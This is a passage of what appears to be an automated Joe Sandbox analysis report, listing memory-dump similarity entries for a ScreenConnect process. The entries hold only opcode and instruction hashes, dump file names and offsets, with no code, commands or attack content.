                                                                                  • API String ID:
                                                                                  • Opcode ID: c56975ea237cbb206baae54b065cbc8136a04fcdf18add0a7977268f69ac640b
                                                                                  • Instruction ID: 2ea29d63e3571fc4ac125397dd092c4616d98b7e0f771f698d69a3df7454a3f2
                                                                                  • Opcode Fuzzy Hash: c56975ea237cbb206baae54b065cbc8136a04fcdf18add0a7977268f69ac640b
                                                                                  • Instruction Fuzzy Hash: 7551577172CA8A4FDB45EF5C98A09E97BA0FF5835470401BEC26DCB293DE24E806C790
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9baa1ff64973aac7a785dba55e89de463460f0956e2ade778415016fe6c6bbf9
                                                                                  • Instruction ID: 3469d11a2ee0697812df09dd0b102214ce60be5f24ffdd7a8679fff3c6735a3f
                                                                                  • Opcode Fuzzy Hash: 9baa1ff64973aac7a785dba55e89de463460f0956e2ade778415016fe6c6bbf9
                                                                                  • Instruction Fuzzy Hash: 6261033565CA098FDBDDEF58C4A4AA573E2FF99304B2405A9D02DCF696CA25F843CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ae9633d013924508538ca37727e61647756089bfc2cda1a309bdf8ea3a0936d2
                                                                                  • Instruction ID: 890e7fcaf389ff870ddcfcacc56938212a25556cd52f35a01509408fa5ccdd11
                                                                                  • Opcode Fuzzy Hash: ae9633d013924508538ca37727e61647756089bfc2cda1a309bdf8ea3a0936d2
                                                                                  • Instruction Fuzzy Hash: 0251BD3165CA4D4FCB84EF2CC455BA67BE1FFA9304B1801BED44DC72A2DA29E842C780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 30918f9fbc823b7a326ef6087cd9bd468870648b52939ab0c2be7f3c59516a4b
                                                                                  • Instruction ID: feccc3f33bba8dae6282ff06bc1ddb7b154b99d01d2e770a82ee2f03f1bd353c
                                                                                  • Opcode Fuzzy Hash: 30918f9fbc823b7a326ef6087cd9bd468870648b52939ab0c2be7f3c59516a4b
                                                                                  • Instruction Fuzzy Hash: 6D411732A1CE494FDB94EF1CC495AB677D0FFA8354B1801BAD65DC72A3DE25E8028781
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7e97c6d7414c89c46f43a98f04fda980eefbe885c4ae77419d9a043705fba36d
                                                                                  • Instruction ID: 3bd4361e16fe92c4d535405b54c88a4c04ec0b33930e56aaeb96b58d11d9767b
                                                                                  • Opcode Fuzzy Hash: 7e97c6d7414c89c46f43a98f04fda980eefbe885c4ae77419d9a043705fba36d
                                                                                  • Instruction Fuzzy Hash: 4541A53575CA4E8FCF84EF1CC450AAA77A1FF99344B1402A9D52EC7296CB35E812CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5f19fb5a9a0974bb7bfc37a1cf55cfee7be8199f004f69393c381c24d8c2cd46
                                                                                  • Instruction ID: 9028c674a67750870ea59fca6fef27e74616eadfdaa7dacaab895ce2a956a419
                                                                                  • Opcode Fuzzy Hash: 5f19fb5a9a0974bb7bfc37a1cf55cfee7be8199f004f69393c381c24d8c2cd46
                                                                                  • Instruction Fuzzy Hash: 2F41D13165CA4D4FCB84EF28C455AA67BE1EFA9310B1401BFD44DC76A2CA39E842C781
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 664eaf261dbf0f6924041188fff74d33d248d7dda7dd94e59e2d27430f65a6d8
                                                                                  • Instruction ID: c2ce3cc10f7a49c7376becf6971f07a97f7544891ea66ac87639bf3f91a7e9b5
                                                                                  • Opcode Fuzzy Hash: 664eaf261dbf0f6924041188fff74d33d248d7dda7dd94e59e2d27430f65a6d8
                                                                                  • Instruction Fuzzy Hash: 09414035718A0E8FDF88EF18C490AA673A2FF98354B505569D51EC7296CB35EC53CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b0712e7544acdf3decaaf4169bcdb5188c6403c310e359382499fc1003a3d416
                                                                                  • Instruction ID: 70750df4a20f538b431791ffea64a33d9bdfd2cc0167682f0a28785c70472161
                                                                                  • Opcode Fuzzy Hash: b0712e7544acdf3decaaf4169bcdb5188c6403c310e359382499fc1003a3d416
                                                                                  • Instruction Fuzzy Hash: 23318A36E6DE174AEBB9AB2940516F961D3EF84304F941538D53EC21F1EE29B8468340
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9c6ea8c785cbad0caa7e92b5ae3bd8b87d68c7638001e60960188ba0828e3890
                                                                                  • Instruction ID: 866d6fb6b6623ee886d218f730f6aae6f7032b46f4ce1cfe17a7f1b12ed8de2b
                                                                                  • Opcode Fuzzy Hash: 9c6ea8c785cbad0caa7e92b5ae3bd8b87d68c7638001e60960188ba0828e3890
                                                                                  • Instruction Fuzzy Hash: 9B21C232A5C95D8FDB64EF18D404AEA7BE4FFA9310F0501A6E51DC71A1CA34E995CBC0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8c6cb0d58dd1a65b03b676c3118415cb046e06b09a302da4eec59a7b3b6ecbcb
                                                                                  • Instruction ID: 22e6aaf56ff139f035312db0cb9a71a04ada1550e3bd716abe3d2b14915e4754
                                                                                  • Opcode Fuzzy Hash: 8c6cb0d58dd1a65b03b676c3118415cb046e06b09a302da4eec59a7b3b6ecbcb
                                                                                  • Instruction Fuzzy Hash: 48218130758A098FDBA8EB2CD495E7673E5FFA8300B540569D04EC72A2DE25EC82C780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 801c19a8ee35cf6fa37c10abe0431803c22746160fd82b20e9c9028156d7ff57
                                                                                  • Instruction ID: 4b4df4bd845160f0968a5dd2252ea8f1f644d183e81c2be3d1660c7536e39469
                                                                                  • Opcode Fuzzy Hash: 801c19a8ee35cf6fa37c10abe0431803c22746160fd82b20e9c9028156d7ff57
                                                                                  • Instruction Fuzzy Hash: 8A21933575890E8FDB84EF18C440AAAB3A1FF99304B104579D51EC7296DF35E853CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2dd7f807adb18d50dfde08e86d6a223564fd7350faf2b84a14af416dda156938
                                                                                  • Instruction ID: 68b053c36ab9b265f018dfdb1e073a915a19b8498d09e061a393a840ee688a3f
                                                                                  • Opcode Fuzzy Hash: 2dd7f807adb18d50dfde08e86d6a223564fd7350faf2b84a14af416dda156938
                                                                                  • Instruction Fuzzy Hash: EB21D1319ACA8E4FD742EF6888156EE7BF5EF89200F0404BBE15CC31A3CA2C5941C750
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4f233c76098c291055cd761a7484ac43db62905393e97b316ae38858f3b6fe17
                                                                                  • Instruction ID: 46fd9921a4d7d047c89b8ad45ce39c09ebd22f230e97b9a136e4e12c6530fba1
                                                                                  • Opcode Fuzzy Hash: 4f233c76098c291055cd761a7484ac43db62905393e97b316ae38858f3b6fe17
                                                                                  • Instruction Fuzzy Hash: E421FC74318A498FDF98EF18C094A6573E2FF6D34536401A9D91ACB296CA31EC42CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5cb1a33d3b9460f5bf13e96eb69a5377b4fffa8bbe76064d8a137f69b2b610b9
                                                                                  • Instruction ID: c2d3ba803b3ee2f89f0847cfe771fb8da9f2a90da98f33d5fbce474ca04f36ad
                                                                                  • Opcode Fuzzy Hash: 5cb1a33d3b9460f5bf13e96eb69a5377b4fffa8bbe76064d8a137f69b2b610b9
                                                                                  • Instruction Fuzzy Hash: D4114C3120C9088FDF98DE28D491FA537E2FBA9314F1401ACD45EDB693DA22F846CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 381660f8b5694c1f26e4906fa73c15aeaf3b3cd38540de75171870d374cb6151
                                                                                  • Instruction ID: e0551416855abbad270df0c9a3f2acbc18172c71ac3c8bf17785bfc2774d478e
                                                                                  • Opcode Fuzzy Hash: 381660f8b5694c1f26e4906fa73c15aeaf3b3cd38540de75171870d374cb6151
                                                                                  • Instruction Fuzzy Hash: 8111E93166CD8D4FDB84EF1CD840AE97795FF58304F4405A9E92DC7282CA35E852C780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4c3421918923fb2cb7b276eb8f61caa2596082765ec2cf33ab642cdf55b1f75a
                                                                                  • Instruction ID: 8b37d0b813d901b41284c8cd1459b1ecd4f8b564ede399ff0138e25e95aac5d4
                                                                                  • Opcode Fuzzy Hash: 4c3421918923fb2cb7b276eb8f61caa2596082765ec2cf33ab642cdf55b1f75a
                                                                                  • Instruction Fuzzy Hash: DA11E831B6891E8FDF94EB6CC455ABDB3E1FF98301B55007AD51ED36A1DE25A8018B00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d6b3fbead31d92775df418abae678231967cf9ea35a0d79b6e46dd4f1cab484c
                                                                                  • Instruction ID: 0d4ec5e74ddad873cff7dd544533fcdf13d8e2cfa5615e4d5926a88b138b9592
                                                                                  • Opcode Fuzzy Hash: d6b3fbead31d92775df418abae678231967cf9ea35a0d79b6e46dd4f1cab484c
                                                                                  • Instruction Fuzzy Hash: 2C01C071948A8D8FCB42DF68C8055E97FE0FF69314B0542ABE40CE7261DB349944CB92
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 850f43b023ddd4cfcb0601a5100ac0ef0b8999fc2adab789654412daaf3da4dd
                                                                                  • Instruction ID: d962a83450c33cbcb0dc7e76adf16dbd829a52a31ca03674aa46afb1877e0543
                                                                                  • Opcode Fuzzy Hash: 850f43b023ddd4cfcb0601a5100ac0ef0b8999fc2adab789654412daaf3da4dd
                                                                                  • Instruction Fuzzy Hash: 82011E31A68A0E8FDB94EF58C4056BEB6E5FF58301F40087AE52DD36A1DE3569408780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bdfb5acd7b0490c0906bd4b71b0875cc15be460305979d45a84f0f8382c825af
                                                                                  • Instruction ID: 7c1ae222c85d304bd04659ab8e85eee148b6917cea2a54090371bbf8afab5dfe
                                                                                  • Opcode Fuzzy Hash: bdfb5acd7b0490c0906bd4b71b0875cc15be460305979d45a84f0f8382c825af
                                                                                  • Instruction Fuzzy Hash: 3C0128226AD9CA0FD7069B3888649B17FE6EF5A24070940F6D159C75F3DE18EC06C340
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6a31270f1d1fdb74441d76b42a806b232c0c2ea632e8a58f82cdde55c07dcccf
                                                                                  • Instruction ID: 9f991fc3a7d7c721affaef1bfe66b18759d60dc84c20612d81345bfbf417e770
                                                                                  • Opcode Fuzzy Hash: 6a31270f1d1fdb74441d76b42a806b232c0c2ea632e8a58f82cdde55c07dcccf
                                                                                  • Instruction Fuzzy Hash: 19018C71A48A4C8FDB44EF5CC4089EE7BE0FFA8315B0502AAE50DE7262DB34D904CB85
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fd2887eccea82145afcbfecc5ee40aa3bae3ccc0adabaf4000409f81286f758a
                                                                                  • Instruction ID: eff5ada0c00672f0ca73f64a737e7393c13732f21f64c0ce21c7259e1b33614f
                                                                                  • Opcode Fuzzy Hash: fd2887eccea82145afcbfecc5ee40aa3bae3ccc0adabaf4000409f81286f758a
                                                                                  • Instruction Fuzzy Hash: 7401DF3169894D8FCF44FF28C485ADA73A4FF58304F4001AAE81ECB251DB36E992CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4f31c2159ef831a3225844b8305832b8b5bbea5cb87e8d73a3c583072ca71db7
                                                                                  • Instruction ID: 41a7bcdd78fd8121bded1efed5b97ddecd8c95623df0c95bffd1129f6ea4b7ce
                                                                                  • Opcode Fuzzy Hash: 4f31c2159ef831a3225844b8305832b8b5bbea5cb87e8d73a3c583072ca71db7
                                                                                  • Instruction Fuzzy Hash: F8018426F2CA1746FBB8922990653B960D3EF88341F18927AC42DC25E5ED6CFC818741
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2180c965e62c1a04511e4ed69e8d2a168308814aa23d9ede969a76be8b75b77e
                                                                                  • Instruction ID: 679f516cca805a5699dbd9e1f5b73b8e7dbc4a891d36dc9082b31a2e8048346d
                                                                                  • Opcode Fuzzy Hash: 2180c965e62c1a04511e4ed69e8d2a168308814aa23d9ede969a76be8b75b77e
                                                                                  • Instruction Fuzzy Hash: CE01EC303689098FDB98EF1CC495E69B3E1FF6834070501A5E55ACB2B2DF24EC42CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d7be64fb78d27d28e2a7451a37e141ed167a430221f731a4391a7b85c9f5e508
                                                                                  • Instruction ID: cb5f8d87cd71c460300605f832e41e3314b0cd315c58ee5b7926ab5a1f9ca508
                                                                                  • Opcode Fuzzy Hash: d7be64fb78d27d28e2a7451a37e141ed167a430221f731a4391a7b85c9f5e508
                                                                                  • Instruction Fuzzy Hash: 7901F925B7CD4A0FAB88EB2C40855F9B3C1FBAC35476442B6D51DC32AADD24DC428380
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 54a649eddc7d58c9a2cddb9531a924e11872a9cac28b80712356c1afc07132c1
                                                                                  • Instruction ID: de21c4ff23bc13e4eb1cb583bfa688dd00490679280dee74b966dd2c73ccc167
                                                                                  • Opcode Fuzzy Hash: 54a649eddc7d58c9a2cddb9531a924e11872a9cac28b80712356c1afc07132c1
                                                                                  • Instruction Fuzzy Hash: 48F09C21778D0D0F5F88EB6C54595BAA2D5FBEC26475442B7D41DC33AADD14D9428340
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e7d137c18c30183cb8f6a60e3b4d00c8949519a9cc96009a48b51fc8646f50e0
                                                                                  • Instruction ID: 03750562a0153ff3e34c040cd2de3f14885f428451e59c4afca21f694687f003
                                                                                  • Opcode Fuzzy Hash: e7d137c18c30183cb8f6a60e3b4d00c8949519a9cc96009a48b51fc8646f50e0
                                                                                  • Instruction Fuzzy Hash: 81018436B2DA070AEFBDDA1D44A42F511D3AF44305F44227DD96ECA1D7EE18F8054351
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1f0f03a5c22c46cc83e3fabf3443f166c4d6a57807841feb99818259c1969332
                                                                                  • Instruction ID: f5332374a09545ce0ed03962f55e175a6e74d312bbeee81562b58ff6d85e5d4d
                                                                                  • Opcode Fuzzy Hash: 1f0f03a5c22c46cc83e3fabf3443f166c4d6a57807841feb99818259c1969332
                                                                                  • Instruction Fuzzy Hash: 0EF09633B6C81A4BDB48EA0CA5425F9B3D1EB98320745117AE71DC3597DD15F81246C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c101ccc349cc5ba757f4c8c9453cdaeeb416a9718cff33b2fe6e5975de96835c
                                                                                  • Instruction ID: fb9a627f60b02596b6a30b22208e25418f9cc32653d28f35318f7795643f3c12
                                                                                  • Opcode Fuzzy Hash: c101ccc349cc5ba757f4c8c9453cdaeeb416a9718cff33b2fe6e5975de96835c
                                                                                  • Instruction Fuzzy Hash: 26013C22E9E7D64FE766876888280A87F709F07350F5941FBC558CB1F3DA2D694A8311
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c753c6be5102179d530e8240fafdd542f473574d9d7f27caf6a145bba3285423
                                                                                  • Instruction ID: 75bfb2b4e4ffd032e3326412c9b6eb06c3b4815bd779960089918f71b86c47df
                                                                                  • Opcode Fuzzy Hash: c753c6be5102179d530e8240fafdd542f473574d9d7f27caf6a145bba3285423
                                                                                  • Instruction Fuzzy Hash: 1EF0FF3172CE4A4FDB85EF1C9440AEAB7E1FF98380B10016BD51EC3292CE35E8628780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 361960455bc8a5b8d51f1c29de8771526510341a7abec90b15002ee491dee822
                                                                                  • Instruction ID: 6fdc91e4681efedb1cd1643c8876befaed9aca54e77c68e34a4f59cd9a61646f
                                                                                  • Opcode Fuzzy Hash: 361960455bc8a5b8d51f1c29de8771526510341a7abec90b15002ee491dee822
                                                                                  • Instruction Fuzzy Hash: 30F0443266CF0E4FFAA4EB6994516F5B392FF54310F501579D52EC3292EE59F8418340
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0410338472b0f349d49cbbb51327c9a1960a930497e440b6cd285e6442ac0480
                                                                                  • Instruction ID: 84d8e802f6f91abc9ae72f886e591d16e5c641d86dff2cc88ecf7459a48f4c1e
                                                                                  • Opcode Fuzzy Hash: 0410338472b0f349d49cbbb51327c9a1960a930497e440b6cd285e6442ac0480
                                                                                  • Instruction Fuzzy Hash: 5CF0C271A29A9D4FCB94DF2CD454B25BBE1FF4D35171904E8C559D73A5CA20EC438380
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2612109772.00007FFE7CDBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CDBA000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7cdba000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: aeea56d4e302a7bb34c4710695e9b162237e4aeac46cfb243c6b53f8aecd5587
                                                                                  • Instruction ID: 76df27c52b56583de32e46271e30d7a45b57d337fc9c035f8a0e964758677f6f
                                                                                  • Opcode Fuzzy Hash: aeea56d4e302a7bb34c4710695e9b162237e4aeac46cfb243c6b53f8aecd5587
                                                                                  • Instruction Fuzzy Hash: F3F0C470A04A0C8FCF44EF58C808AEA7BF1FB68315B01426AE409E3220DB71A944CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2621536182.00007FFE7D0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7D0C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7ffe7d0c0000_ScreenConnect.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c51b7c395f200462357748ae36217e55648faf989fbf616b63c39e3640f9b72e
                                                                                  • Instruction ID: c28219ec284d16bec2d26f64a71c949e0e104bb6c65e554b5a18abb960fe83c9
